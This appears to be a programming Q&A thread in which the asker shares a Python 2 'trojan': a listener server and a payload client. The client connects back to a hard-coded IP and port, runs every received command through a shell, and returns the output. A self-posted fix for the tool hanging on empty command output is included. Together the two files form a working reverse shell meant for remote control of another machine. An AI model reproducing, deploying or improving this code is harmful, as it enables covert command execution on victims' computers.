# The trojan stucks when stdoutput is not a string

Tags: python, python-2.7, sockets, subprocess

When I launch the server (trojan.py file) and then the client (payload.py file)
all works fine. All the commands in the cmd that I am writing works good and without problems. But... When I type commands like "mkdir" or "start" and all the commands that don't produce a string output, the program stucks and nothing is working. The commands like "ipconfig" or "help" or "dir" that does produce a string output works good and don't crush the program...
Thanks for helping...

## the trojan.py file (the server)

```
#import required modules
import socket

#creating a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#setting up host, port
host = raw_input("Enter your Host IP:\n")
port = raw_input("Enter your desired Port:\n")

#bind address to Host
try:
    s.bind((host, int(port)))
except socket.error:
    print "[!]Error: Permission Denied, please run as Administrator."
    exit()
#start listening for incoming connection
s.listen(1)
while True:
    print "[*]Deploying Server on:" + str(host) + ", port:" + str(port)
    print "[*]Waiting for incoming connection..."
    #accept connection
    c, addr = s.accept()
    print "[+]Connection established with:" + str(addr)
    #control cmd
    while True:
        try:
            cmd = raw_input("cmd:")
            if cmd == "exit":
                print "[!]Exiting"
                c.send("exit")
                s.close()
                exit()
            c.send(cmd)
```

## because of something in here it fails...

```
            stdoutput = c.recv(8000)
            print stdoutput
        except KeyboardInterrupt:
            print "[!]Exiting"
            c.send("exit")
            s.close()
            exit()
```

## the payload.py file (the client)

```
import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

host = "10.0.0.3"
port = 4444

try:
    s.connect((host, port))
except socket.error:
    s.close()
    s.connect((host, port))
while 1:
    cmd = s.recv(1024)
    if cmd == "exit":
        s.close()
        exit()
```

## this lines of code are sending "stdoutput" to the server (the trojan.py file)

```
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)
```

Comment: include the stacktrace

Comment: I don't fully understand the issue you're having, but I'd suggest trying `proc.communicate()` as a first stab at fixing your deadlock.

Answer (score 0):

Thanks for trying to help, but I have fugured it out myself:

```
#I have included an if statement:
if len(stdoutput) > 0:
    s.send(stdoutput)
else:
    s.send("Nothing Received")
```

This has fixed the Problem)))

Comment: You might delete the question, unless you can narrow it into something that would be helpful to other people.